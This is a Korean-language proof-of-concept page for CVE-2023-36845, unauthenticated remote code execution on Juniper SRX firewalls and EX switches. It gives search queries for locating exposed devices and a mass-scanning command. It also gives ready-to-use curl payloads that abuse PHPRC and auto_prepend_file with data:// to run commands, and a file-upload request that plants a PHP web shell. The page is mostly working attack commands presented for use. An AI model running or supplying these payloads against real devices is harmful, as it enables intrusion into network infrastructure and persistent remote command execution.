
CVE-2023-36845에 대한 개념 증명 익스플로잇으로, PHP 환경 변수 조작을 통해 Juniper SRX 방화벽 및 EX 스위치에서 인증 없이 원격 코드 실행을 가능하게 합니다.
CVE-2023-36845는 Juniper SRX 방화벽과 EX 스위치에 영향을 미치는 주목할 만한 PHP 환경 변수 조작 취약점입니다. Juniper는 이 취약점을 중간 심각도로 분류했지만, 이 문서에서는 이 단일 취약점이 어떻게 원격의 인증되지 않은 코드 실행에 악용될 수 있는지 설명합니다.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
탐지
python3 CVE-2023-36845.py -f targets.txt -o output.txt
auto_prepend_file과 함께 임의의 프로토콜 래퍼를 사용하는 것이 가능합니다. 이 작업에 가장 적합한 선택은 "보조 파일"을 인라인으로 제공할 수 있는 data:// 프로토콜입니다. 다음은 data:// 체계 내에서 포함된 <? phpinfo(); ?>를 실행하는 이 익스플로잇의 정교한 표현입니다:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
whoami 명령 실행
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
파일 업로드
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| 매개변수 | 설명 | 유형 |
|---|---|---|
| --file / -f | 대상 파일 입력 | 파일 |
| -o | 출력 파일 | 파일 |